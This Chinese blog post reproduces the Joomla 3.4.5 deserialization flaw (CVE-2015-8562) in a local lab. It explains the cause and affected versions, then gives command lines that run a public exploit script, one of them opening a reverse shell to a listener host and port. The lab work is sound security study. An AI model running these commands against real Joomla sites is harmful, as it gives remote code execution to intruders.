2. 程式人生 > 其它 >Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)

阿新 發佈:2021-08-29

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562

2021822

21:22

漏洞介紹:

本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Joomlasession儲存在Mysql資料庫中,編碼是utf8,當我們插入4位元組的utf8資料時則會導致截斷。截斷後的資料在反序列化時就會失敗,最後觸發反序列化漏洞。

通過Joomla中的Gadget,可造成任意程式碼執行的結果。

漏洞影響版本:

Joomla 1.5.x, 2.x, and 3.x before 3.4.6

PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

漏洞復現(環境需要自行安裝):

安裝完成之後,是這樣的效果:

直接使用相關的exp工具:

E:\A-note-note\漏洞復現\Joomla 3.4.5 反序列化漏洞(CVE-2015-8562\rusty_joomla_rce

python3 rusty_joomla_exploit.py -t http://192.168.31.70:8080/

之後直接反彈shell:

python3 rusty_joomla_exploit.py -t http://192.168.31.70:8080/ --exploit --lhost 192.168.31.244 --lport 6666

返回了shell:

相關推薦

Joomla 3.4.5 序列漏洞CVE-2015-8562

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562) 2021年8月22日 21:22 漏洞介紹: 本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Jooml

ActiveMQ序列漏洞CVE-2015-5254復現

ActiveMQ序列漏洞CVE-2015-5254復現 導語 Apache ActiveMQ是美國阿帕奇Apache軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務、叢集、Spring Framework等。

ActiveMQ序列漏洞CVE-2015-5254

0x01漏洞概述 ActiveMQ Web控制檯分為三個應用程式,admin,api和fileserver,其中admin是管理員頁面,api是介面,fileserver是儲存檔案的介面;管理員和 API 需要先登入才能使用,檔案伺服器不需要登入。

Apache Shiro 1.2.4序列漏洞CVE-2016-4437

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Apache Shiro 1.2.4序列漏洞CVE-2016-4437復現

Apache Shiro 1.2.4序列漏洞CVE-2016-4437復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

漏洞復現 - Apache Shiro 1.2.4序列漏洞CVE-2016-4437

漏洞原理 Apache Shiro 是 Java 的一個安全框架,可以幫助我們完成:認證、授權、加密、會話管理、與 Web 整合、快取等功能,應用十分廣泛。

Weblogic &lt; 10.3.6 'wls-wsat' XMLDecoder 序列漏洞CVE-2017-10271

Weblogic的WLS Security元件對外提供webservice服務,其中使用了XMLDecoder來解析使用者傳入的XML資料,在解析的過程中出現序列漏洞,導致可執行任意命令。

Apache Dubbo序列漏洞CVE-2019-17564復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架,核心功能是方便麵向介面的遠端過程呼叫,叢集容錯和負載均衡,以及服務自動註冊與發現。

漏洞復現系列】WebLogic XMLDecoder序列漏洞CVE-2017-10271

使用vulhub環境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 啟動測試環境:

jboss序列漏洞復現(CVE-2017-7504)

0x01 環境 使用vulhub搭建:/vulhub-master/jboss/CVE-2017-7504 漏洞點:http://192.168.255.130:8080/jbossmq-httpil/HTTPServerILServlet

PHP序列漏洞1

技術標籤:基礎Web漏洞簡述php安全 背景 Serialize() //將一個物件轉換成一個字串

fastjosn序列漏洞歷史CVE學習整理

fastjosn 序列漏洞學習 fastjson 1.2.24序列漏洞復現 先寫一個正常的使用 fastjson的web服務

網路傳輸時既有管道流PipedInputStream 與 PipedOutStream又有序列化物件、反序列化物件ObjectOutputStream與 ObjectInputStream,還有在集合中、流中都有的身影的Properties究竟是何方神物?我們該怎麼選擇呢?

網路傳輸時既有管道流PipedInputStream 與 PipedOutStream又有序列化物件、反序列化物件ObjectOutputStream與 ObjectInputStream,還有在集合中、流中都有的身影的Properties究竟是何方神物?我們該怎麼選擇

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

IE 11瀏覽器0day漏洞CVE-2015-2425UAF分析

前言 CVE-2015-2425是Hacking team洩露出來的一個IE11的0day漏洞,影響了IE11及之前的版本。在一封Hacking Team高層收到的來自Vectra Networks安全公司的信件中被發現。Vectra Networks公司的研究者在信中向Hacking

Apache Shiro 1.2.4序列漏洞(CVE-2016-4437) 復現

前言 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

漏洞復現】Shiro<=1.2.4序列漏洞

0x01 概述 Shiro簡介 Apache Shiro是一個強大且易用的Java安全框架,執行身份驗證、授權、密碼和會話管理。使用Shiro的易於理解的API,您可以快速、輕鬆地獲得任何應用程式,從最小的移動應用程式到最大的網路和企業

Apereo CAS 4.1 序列 RCE 漏洞

0x01漏洞概述 ​Apereo CAS 是一個企業單點登入系統。CAS 嘗試通過 Apache Commons Collections 庫序列化物件時存在問題,該漏洞存在 RCE 漏洞

Shiro序列漏洞利用匯總Shiro-550+Shiro-721

Apache Shiro是一個強大易用的Java安全框架,提供了認證、授權、加密和會話管理等功能。Shiro框架直觀、易用,同時也能提供健壯的安全性。

原來不只是fastjson,這個你每天都在用的類庫也被爆過序列漏洞

GitHub 15.8k Star 的Java工程師成神之路,不來瞭解一下嗎! GitHub 15.8k Star 的Java工程師成神之路,真的不來瞭解一下嗎!